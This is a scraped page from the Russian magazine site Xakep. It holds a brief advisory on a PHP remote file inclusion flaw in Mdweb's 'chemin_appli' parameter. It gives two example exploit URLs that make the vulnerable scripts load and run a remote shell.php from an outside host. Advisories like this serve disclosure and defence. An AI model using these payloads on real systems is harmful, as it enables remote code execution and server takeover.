Карта сайта Хакер в RSS Энциклопедия Хакера PDA версия сайта Почтовые рассылки Хакера    Хакер в Twitter Хакер в ВКонтакте Приложение Хакер для Facebook Хакер на Formspring.me
Журнал Новости Форум Видео Life Xakep Live (блоги)
Bugtrack Статьи Блог Поиск English
Трюки с phpinfo Трюки с phpinfo
Совсем недавно в паблике появилась информация о новом интересном подходе к эксплуатации уязвимостей класса LFI с помощью бесполезной на первый взгляд функции phpinfo() и временных загрузочных файлов. Берем на вооружение этот полезный прием....
 Интервью с создателем NGINX Игорем Сысоевым Интервью с создателем NGINX Игорем Сысоевым
Легкий веб-сервер NGINX буквально только что вышел на 2 место по популярности в интернете. А незадолго до этого создатель NGINX привлек 3 млн. долларов инвестиций и основал одноименную компанию. В общем, поводов для общения с Игорем Сысоевым у нас была масса....

PHP-инклюдинг в Mdweb

Bookmark and Share

Программа: Mdweb132-postgres

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "chemin_appli" некоторыми сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример:

http://www.site.com/Agora_PATH//mdweb/admin/inc/ organisations/form_org.inc.php?chemin_appli= http://sonic-banda-di-lamer.gay/shell.php?
http://www.site.com/Agora_PATH//mdweb/admin/inc/ organisations/country_insert.php?chemin_appli= http://sonic-banda-di-lamer.gay/shell.php?




Уязвимости в Mdweb (всего 1)

В энциклопедии: PHP-инклюдинг



СЛЕДУЮЩИЕ СТАТЬИ
Межсайтовый скриптинг в WordPress Twitter Feed Plugin
Межсайтовый скриптинг в WWWthreads
Межсайтовый скриптинг в WordPress Safe Search Plugin
Межсайтовый скриптинг в DotNetNuke
Выполнение произвольного кода в Babylon
Межсайтовый скриптинг в Contenido
Переполнение буфера в Freefloat FTP Serve
Переполнение буфера в VideoCharge Studio
Межсайтовый скриптинг в ZyXEL Prestige
Переполнение буфера в ProVJ
ПРЕДЫДУЩИЕ СТАТЬИ
PHP-инклюдинг в SourceForge
Множественный PHP-инклюдинг в OTSCMS
Обход ограничений безопасности при запуске сценариев Python через Sudo
Отказ в обслуживании в QK SMTP
SQL-инъекция в PHP-Nuke
PHP-инклюдинг в Open Meetings Filing Application
PHP-инклюдинг в kawf
PHP-инклюдинг в CASTOR
PHP-инклюдинг в RSSonate
PHP-инклюдинг в EZ-Ticket
ОБСУЖДЕНИЕ СТАТЬИ
Логин:
Пароль:
Если у вас есть форумный логин - вы можете использовать его, иначе анонимный гостевой доступ.

Для оставления комментария вы можете зарегистрироваться по упрощенной процедуре.
Для отправки сообщения введите код, указанный на картинке
Сообщение




Keywords: zPOSTz zSCOLOURz, zHACKz, zSOFTz, zNEWSz, zYANDEXz z34682z
Для Авторов: edit Lock delete Lock


    Rambler's Top100